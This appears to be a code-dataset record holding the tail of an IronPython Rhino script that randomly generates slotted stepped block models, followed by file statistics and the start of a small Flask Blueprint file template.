Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2, rightPointY - perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2, rightPointY + perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2, leftPointY + perpendicularVector.Y*width/2,0),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2, leftPointY - perpendicularVector.Y*width/2,0)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepTotalVolume = Rhino.Geometry.Brep.CreateBooleanUnion([brepUnion[0],brepToSubtract],tolerance)[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if(brepTotalVolume == brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume and brepUnion is not None):
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
elif(orientationIdx == 2):
lowerBlock = bool(random.randint(0,1))
if(straight):
yAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointY = leftMargin + random.random()*(point1.Y - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(yAxis):
rightPointY = leftPointY + random.random()*(point1.Y-leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ- point1.Z,point2.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height, rightPointY, rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height,rightPointY + width/2,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointY = leftMargin + random.random()*(point1.Y -leftMargin)
leftPointZ = leftMargin + point1.Z + random.random()*(point2.Z -point1.Z - leftMargin)
if(yAxis):
rightPointY = leftPointY + random.random()*(point2.Y-leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ - point1.Z ,point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point1.X,leftPointY,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(point1.X + height, rightPointY ,rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointY,point2.Y-leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(0,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(height,rightPointY + width/2,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
else:
if(lowerBlock):
leftPointY = leftMargin + random.random()*(point1.Y-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointY = leftPointY + random.random()*(point1.Y - leftPointY - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointY,point1.Y-rightPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(0, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(0, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
leftPointY = leftMargin + random.random()*(point1.Y - leftMargin)
leftPointZ = leftMargin + point1.Z + random.random()*(point2.Z - leftMargin - point1.Z)
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointY, point1.Y - leftPointY)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(point1.X, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point1.X + height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
elif (orientationIdx == 3):
leftPointY = leftMargin + random.random()*(point2.Y-leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z-leftMargin)
if(straight):
yAxis = bool(random.randint(0,1))
if(yAxis):
rightPointY = leftPointY + random.random()*(point2.Y - leftPointY-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point2.Z - leftPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point2.X -height,leftPointY,leftPointZ - width/2)
upperDiagonal = Rhino.Geometry.Point3d(point2.X,rightPointY ,rightPointZ + width/2)
else:
rightPointY = leftPointY
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointY,point2.Y - leftPointY)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(point2.X - height,leftPointY - width/2,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(point2.X,rightPointY + width/2, rightPointZ)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
rightPointY = leftPointY + random.random()*(point2.Y -leftPointY - 3)
rightPointZ = leftPointZ + random.random()*(point2.Z -leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointY,
point2.Y -leftPointY,
leftPointZ,
point2.Z -rightPointZ)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(0,leftPointY,leftPointZ),
Rhino.Geometry.Point3d(0,rightPointY,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(0,-1*(rightPointZ-leftPointZ),(rightPointY-leftPointY))
points = [Rhino.Geometry.Point3d(point2.X - height, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X - height, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, leftPointY - perpendicularVector.Y*width/2,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, leftPointY + perpendicularVector.Y*width/2,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, rightPointY + perpendicularVector.Y*width/2,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(point2.X, rightPointY - perpendicularVector.Y*width/2,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepTotalVolume = Rhino.Geometry.Brep.CreateBooleanUnion([brepUnion[0],brepToSubtract],tolerance)[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if(brepTotalVolume == brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume):
brepTotalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
elif(orientationIdx == 4):
lowerBlock = True#bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point1.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,height,rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X -leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ, point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX , height, rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointX-point1.X,point2.X-rightPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointZ,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointX - point1.X, point2.X - rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
lowerBlock = bool(random.randint(0,1))
if(straight):
xAxis = bool(random.randint(0,1))
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ,point1.Z-rightPointZ)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX,height,rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-leftPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X -leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
if(xAxis):
rightPointX = leftPointX + random.random()*(point2.X-leftPointX-3)
rightPointZ = leftPointZ
width = 2.5 + random.random()*(min(leftPointZ, point2.Z - rightPointZ )-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX,0,leftPointZ-width/2)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX , height, rightPointZ + width/2)
else:
rightPointX = leftPointX
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ-3)
width = 2.5 + random.random()*(min(leftPointX-point1.X,point2.X-rightPointX)-2.5)
bottomDiagonal = Rhino.Geometry.Point3d(leftPointX - width/2,0,leftPointZ)
upperDiagonal = Rhino.Geometry.Point3d(rightPointX + width/2,height,rightPointZ)
brepToSubtract = AddBrepBox(bottomDiagonal,upperDiagonal)
brepArrayToCheck = [brepBox1,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
else:
if(lowerBlock):
leftPointX = leftMargin + random.random()*(point2.X-leftMargin)
leftPointZ = leftMargin + random.random()*(point1.Z-leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX - 3)
rightPointZ = leftPointZ + random.random()*(point1.Z - leftPointZ - 3)
width = 2.5 + random.random()*(min(leftPointX,point2.X-rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointZ,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox1,brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
if(brepUnion is not None):
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
else:
brepTotalVolume = 100000
else:
leftPointX = leftMargin + point1.X + random.random()*(point2.X - point1.X - leftMargin)
leftPointZ = leftMargin + random.random()*(point2.Z - leftMargin)
rightPointX = leftPointX + random.random()*(point2.X - leftPointX -3)
rightPointZ = leftPointZ + random.random()*(point2.Z - leftPointZ -3)
width = 2.5 + random.random()*(min(leftPointX - point1.X, point2.X - rightPointX)-2.5)
sqrDist = SquareDistanceBetweenTwoPoints(
Rhino.Geometry.Point3d(leftPointX,0,leftPointZ),
Rhino.Geometry.Point3d(rightPointX,0,rightPointZ))
perpendicularVector = (1/math.sqrt(sqrDist))*Rhino.Geometry.Vector3d(-1*(rightPointZ-leftPointZ),0,(rightPointX-leftPointX))
points = [Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,0,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,0 ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,0,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,0,rightPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX - perpendicularVector.X*width/2,height,leftPointZ - perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(leftPointX + perpendicularVector.X*width/2,height ,leftPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX + perpendicularVector.X*width/2,height,rightPointZ + perpendicularVector.Z*width/2),
Rhino.Geometry.Point3d(rightPointX - perpendicularVector.X*width/2,height,rightPointZ - perpendicularVector.Z*width/2)]
plane = Rhino.Geometry.Plane(points[0],points[3],points[4])
brepToSubtract = Rhino.Geometry.Box(plane,points).ToBrep()
brepArrayToCheck = [brepBox2,brepToSubtract]
brepUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArrayToCheck,tolerance)
brepTotalVolume = brepUnion[0].GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
brepSubtractArray = [brepToSubtract]
check,curves,points = Rhino.Geometry.Intersect.Intersection.BrepBrep(brepToSubtract,brepFillet,tolerance)
brepBoxUnion = Rhino.Geometry.Brep.CreateBooleanUnion(brepArray,tolerance)
brepAddArray = [brepBoxUnion[0]]
if(len(curves)== 0):
brepSubtractArray.append(brepFillet)
brepModel = Rhino.Geometry.Brep.CreateBooleanDifference(brepAddArray,brepSubtractArray,tolerance)
totalVolume = brepBox1.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume + brepBox2.GetBoundingBox(Rhino.Geometry.Vector3d(0,0,1)).Volume
if ( brepModel is not None and width > 4 and sqrDist > 16 and brepTotalVolume <= totalVolume):
for brep in brepModel:
if(scriptcontext.doc.Objects.AddBrep(brep) != System.Guid.Empty ):
scriptcontext.doc.Views.Redraw()
#rs.Command("_-SaveAs"+" F:\ModuleWorks\RhinoNoHoleIGS\\" + str(modelIdx) + ".igs" + " enter" + " enter",True)
objs = rs.AllObjects(select = True)
#rs.Command("_Delete ")
filled = True
if(filled):
return 1
else:
return 0
if( __name__ == "__main__" ):
i = 0
while (i < 20):
i = i + GenerateSlotsForSteppedModel()
| 79.047297
| 169
| 0.6445
| 4,552
| 46,796
| 6.623462
| 0.030756
| 0.121161
| 0.112769
| 0.048292
| 0.941061
| 0.93466
| 0.926401
| 0.915755
| 0.889884
| 0.880066
| 0
| 0.036917
| 0.242286
| 46,796
| 592
| 170
| 79.047297
| 0.813385
| 0.003334
| 0
| 0.717993
| 0
| 0
| 0.000172
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00692
| false
| 0
| 0.015571
| 0
| 0.031142
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c525f873d9cb4c5a8a235a7aeead5a11e7a6d4de
| 174
|
py
|
Python
|
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
.idea/fileTemplates/Blueprint Init.py
|
marcoprado17/flask-bone
|
772d25bdf6c6e41701da1ef2e2a67bae7ae21757
|
[
"MIT"
] | null | null | null |
#parse("header.py")
from flask import Blueprint
${BLUEPRINT_NAME}_blueprint = Blueprint("${BLUEPRINT_NAME}", __name__, static_folder="static", template_folder="templates")
| 29
| 123
| 0.775862
| 20
| 174
| 6.3
| 0.6
| 0.428571
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074713
| 174
| 5
| 124
| 34.8
| 0.782609
| 0.103448
| 0
| 0
| 0
